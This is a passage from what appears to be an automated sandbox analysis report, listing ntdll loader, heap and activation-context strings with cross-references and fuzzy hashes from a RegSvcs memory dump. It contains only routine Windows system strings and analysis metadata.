                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 014D2178
                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 014D219F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                              • API String ID: 0-861424205
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 014D81E5
                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 014D8177, 014D81EB
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0149C6C3
                                                                                                                              • LdrpInitializeProcess, xrefs: 0149C6C4
                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 014D8170
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 014D8181, 014D81F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-475462383
                                                                                                                              • Opcode ID: 6ee8b4992e9ec9682ade2d37ce5591bf79bc29168bb267fe700dba836cb15b54
                                                                                                                              • Instruction ID: 53a17b333c1e43d5705a8d2c1dc9691a87db1ed9634a6adb02261e8f5ee2e538
                                                                                                                              • Opcode Fuzzy Hash: 6ee8b4992e9ec9682ade2d37ce5591bf79bc29168bb267fe700dba836cb15b54
                                                                                                                              • Instruction Fuzzy Hash: 203115716443069BD710EF2ADC45E2ABBD1AFA4B10F05051EF9446B2B1D630EC04C7A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 014A2DF0: LdrInitializeThunk.NTDLL ref: 014A2DFA
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0BA3
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0BB6
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0D60
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0D74
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404860816-0
                                                                                                                              • Opcode ID: 80ad829c096735aec9e7cf6295e1b40c7fe80f26da176ffa200cb575d8e2a6a0
                                                                                                                              • Instruction ID: 8c0bed5839527321b85b2bb3bd97cf99645feee92e220540518cd00bdd6c2208
                                                                                                                              • Opcode Fuzzy Hash: 80ad829c096735aec9e7cf6295e1b40c7fe80f26da176ffa200cb575d8e2a6a0
                                                                                                                              • Instruction Fuzzy Hash: FC426B71900705DFDB21CF28C890BAAB7F4BF14314F4585AAE989EB351E770AA85CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                              • API String ID: 0-3126994380
                                                                                                                              • Opcode ID: 65c4ad25caaf1c2ec6a3162080524a31738d1a3a882cdb11804c6b23a6099332
                                                                                                                              • Instruction ID: d458bf333d4fb28495021f075df66acf45c5a3e4902166d02ee6dbffa5804320
                                                                                                                              • Opcode Fuzzy Hash: 65c4ad25caaf1c2ec6a3162080524a31738d1a3a882cdb11804c6b23a6099332
                                                                                                                              • Instruction Fuzzy Hash: 3692CC71A042499FDB25CF68C440BEEBBF1FF48300F18845AE899AB362D774A946DF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                              • API String ID: 0-379654539
                                                                                                                              • Opcode ID: 808d2b106ddb9752a557256733bf06bc6a46e5bae7944e2b7152409f333a8abc
                                                                                                                              • Instruction ID: 6cfdd3bf53c57f47f47e414cb5bb55b989087353581e8604280a835d431251e0
                                                                                                                              • Opcode Fuzzy Hash: 808d2b106ddb9752a557256733bf06bc6a46e5bae7944e2b7152409f333a8abc
                                                                                                                              • Instruction Fuzzy Hash: D6C18774108B828BD711CF58C544B6AB7E8BF94708F10486FF996AB361E374C94ACB53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01498421
                                                                                                                              • LdrpInitializeProcess, xrefs: 01498422
                                                                                                                              • @, xrefs: 01498591
                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0149855E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1918872054
                                                                                                                              • Opcode ID: c90a563027a6130713e103c15e5a0ec6d4babb124166f4ca0ed35894166af3a8
                                                                                                                              • Instruction ID: faf968c33d6002175afbdceaa9a695d561b5d75ef86df5b8b241f1c642130e86
                                                                                                                              • Opcode Fuzzy Hash: c90a563027a6130713e103c15e5a0ec6d4babb124166f4ca0ed35894166af3a8
                                                                                                                              • Instruction Fuzzy Hash: 8591C071508346AFDB21DF69CC50FABBAE8BFA4754F40082FF68496121E730D908CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 014D21DE
                                                                                                                              • .Local, xrefs: 014928D8
                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014D21D9, 014D22B1
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014D22B6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                              • API String ID: 0-1239276146
                                                                                                                              • Opcode ID: 8d94ff2c33f2d8a691d6bcaf917bb12f6e49f284da4186fe78554bbcdb3d6680
                                                                                                                              • Instruction ID: 04fe8a39e9cf950a1d5422c10e859586b6d5d6288763dd6fde0f851aad6b3c93
                                                                                                                              • Opcode Fuzzy Hash: 8d94ff2c33f2d8a691d6bcaf917bb12f6e49f284da4186fe78554bbcdb3d6680
                                                                                                                              • Instruction Fuzzy Hash: B4A19231A40229AFDF24CF59D884B9AB7B1BF58354F1541EBE908AB361D7709E81CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • RtlDeactivateActivationContext, xrefs: 014D3425, 014D3432, 014D3451
                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 014D3437
                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 014D342A
                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 014D3456
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                              • API String ID: 0-1245972979
                                                                                                                              • Opcode ID: 653a917a091a4532c1dc1c00f136ad9d61e134d535cc38d3e80b979286bf07e7
                                                                                                                              • Instruction ID: 974b915af1f925be5446aa038c21fdeff143f5b65dd992a8ad9b06164528dbb3
                                                                                                                              • Opcode Fuzzy Hash: 653a917a091a4532c1dc1c00f136ad9d61e134d535cc38d3e80b979286bf07e7
                                                                                                                              • Instruction Fuzzy Hash: E76125726407029FDF22CF19C951B2BBBE4AF90B10F19852FE9559B360D734E802CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 014C106B
                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 014C1028
                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014C10AE
                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 014C0FE5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                              • API String ID: 0-1468400865
                                                                                                                              • Opcode ID: d1957b35d4c5f7bcdf813f339f6633225f657adcc0c63249c0de3bc392d7fbe5
                                                                                                                              • Instruction ID: bb4997a24014b075a01959d2582804f22dd9d64eea164f83a84fc979ee9873d4
                                                                                                                              • Opcode Fuzzy Hash: d1957b35d4c5f7bcdf813f339f6633225f657adcc0c63249c0de3bc392d7fbe5
                                                                                                                              • Instruction Fuzzy Hash: E371F1B19043469FCB60DF15C885B9B7FACAFA4768F41046EF9488B266D334D588CBD2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • LdrpDynamicShimModule, xrefs: 014CA998
                                                                                                                              • apphelp.dll, xrefs: 01482462
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014CA9A2
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 014CA992
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-176724104
                                                                                                                              • Opcode ID: b12b1ca09dfd1de5ca3bd5c2aacd857f79e1ca8c07b8b841f53afcb936ae7c0b
                                                                                                                              • Instruction ID: 403ea694d01ee7f322710deefaca31360852b31326e2a05e57daff460575a1d3
                                                                                                                              • Opcode Fuzzy Hash: b12b1ca09dfd1de5ca3bd5c2aacd857f79e1ca8c07b8b841f53afcb936ae7c0b
                                                                                                                              • Instruction Fuzzy Hash: 40313779600306ABDB719F5D9855EAABBB4FB80F04F26001FE8106B375E7B05986D790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 0-1077428164
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                              • API String ID: 0-2779062949
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014CA121
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 014CA10F
                                                                                                                              • LdrpCheckModule, xrefs: 014CA117
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-161242083
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014D82E8
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 014D82DE
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 014D82D7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • PreferredUILanguages, xrefs: 0151C212
                                                                                                                              • @, xrefs: 0151C1F1
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0151C1C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014E4888
                                                                                                                              • LdrpCheckRedirection, xrefs: 014E488F
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 014E4899
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014E2104
                                                                                                                              • LdrpInitializationFailure, xrefs: 014E20FA
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 014E20F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Enter, xrefs: 0146AA13
                                                                                                                              • LdrResSearchResource Exit, xrefs: 0146AA25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • kLsE, xrefs: 01460540
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0146063D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0146A309
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0146A2FB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 0-2766056989
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
